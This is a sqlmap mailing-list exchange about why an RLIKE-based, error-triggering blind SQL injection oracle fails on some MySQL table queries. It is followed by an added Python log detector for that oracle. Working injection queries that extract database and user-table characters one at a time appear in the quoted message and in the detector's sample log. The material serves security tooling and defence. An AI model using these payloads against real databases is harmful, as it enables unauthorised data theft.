Hi.

Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function
here (in your case) is to PROVOKE errors on False, and that's exactly
what's going on here.

In case of True, RLIKE is called with the perfectly valid 0x7474747474, while
in case of False it's called with the erroneous regexp 0x28 ('parentheses not
balanced').

Bye

On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com>
wrote:

> Have an injection that I can use RLIKE to induce a 500 error, but it only
> works in some circumstances. Enumerating the DATABASE() value works, as
> well as the current user, but enumerating values from the database tables
> fails. Even as root on the box, the RLIKE query fails to throw an exception
> when attempting to use RLIKE in some instances.
>
> As you can see in the output below, the user can select the first name
> value from the users table (which is ‘admin’). When using RLIKE to test the
> first character returned with DATABASE() (a ‘p’), you get the parentheses
> not balanced exception as expected. You also get this exception when simply
> selecting ‘a’.
>
> But when you select the first row from the users table and grab the first
> character (an ‘a’), no exception is thrown and an empty result set is
> returned.
>
> Any thoughts?
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
> 0x7474747474 ELSE 0x28 END));
> Empty set (0.01 sec)
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name  |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users


-- 
Miroslav Stampar
http://about.me/stamparm
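From the defender's side, the oracle discussed above leaves a recognisable trace: MySQL error 1139 ("Got error 'parentheses not balanced' from regexp") paired with RLIKE queries whose pattern is a CASE over one character of a subquery result. The following detector is an added example, not code from the thread or from sqlmap; the log lines, the log layout and the function names are constructed for illustration.

```python
import re

# Constructed sample log lines (not from the original thread): application
# error output interleaved with MySQL general-log style query entries.
SAMPLE_LOG = """\
2015-02-21T20:15:01 app ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
2015-02-21T20:15:01 mysql Query SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END))
2015-02-21T20:15:02 mysql Query SELECT name FROM users WHERE id = 42
2015-02-21T20:15:03 app ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
2015-02-21T20:15:03 mysql Query SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),2,1)) > 96) THEN 0x7474747474 ELSE 0x28 END))
2015-02-21T20:15:04 mysql Query SELECT title FROM posts WHERE body RLIKE '^(foo|bar)$'
"""

# MySQL reports regexp compile failures as error 1139; the message text is the one the thread shows.
REGEXP_ERROR = re.compile(r"ERROR 1139 \(42000\): Got error '([^']+)' from regexp")

# Shape of the oracle in the thread: the RLIKE pattern is a subquery returning a CASE
# whose branch depends on one character (ORD(MID(...))) of another subquery's result.
ORACLE_QUERY = re.compile(
    r"\bRLIKE\s*\(\s*SELECT\b.*?\bCASE\s+WHEN\b.*?\b(?:ORD|ASCII)\s*\(\s*(?:MID|SUBSTR(?:ING)?)\s*\(",
    re.IGNORECASE | re.DOTALL,
)

def scan(log_text):
    """Count regexp errors and collect RLIKE queries whose pattern is data-dependent."""
    report = {"regexp_errors": 0, "error_messages": set(), "oracle_queries": [], "other_rlike": 0}
    for line in log_text.splitlines():
        m = REGEXP_ERROR.search(line)
        if m:
            report["regexp_errors"] += 1
            report["error_messages"].add(m.group(1))
            continue
        if re.search(r"\bRLIKE\b", line, re.IGNORECASE):
            if ORACLE_QUERY.search(line):
                report["oracle_queries"].append(line.split(" Query ", 1)[1])
            else:
                # An RLIKE with a literal pattern (e.g. a user search) is not the oracle shape.
                report["other_rlike"] += 1
    return report

def verdict(report):
    """Regexp errors together with data-dependent RLIKE patterns match the error-based
    oracle from the thread; regexp errors alone are more likely a bad user-supplied regex."""
    if report["oracle_queries"] and report["regexp_errors"]:
        return "error-based injection probing"
    if report["regexp_errors"]:
        return "regexp errors without oracle-shaped queries"
    return "clean"

if __name__ == "__main__":
    r = scan(SAMPLE_LOG)
    print(verdict(r), r["regexp_errors"], len(r["oracle_queries"]), r["other_rlike"])
```

A real deployment would read the MySQL error log or the application's exception log instead of the embedded sample and alert on the first "error-based injection probing" verdict per client.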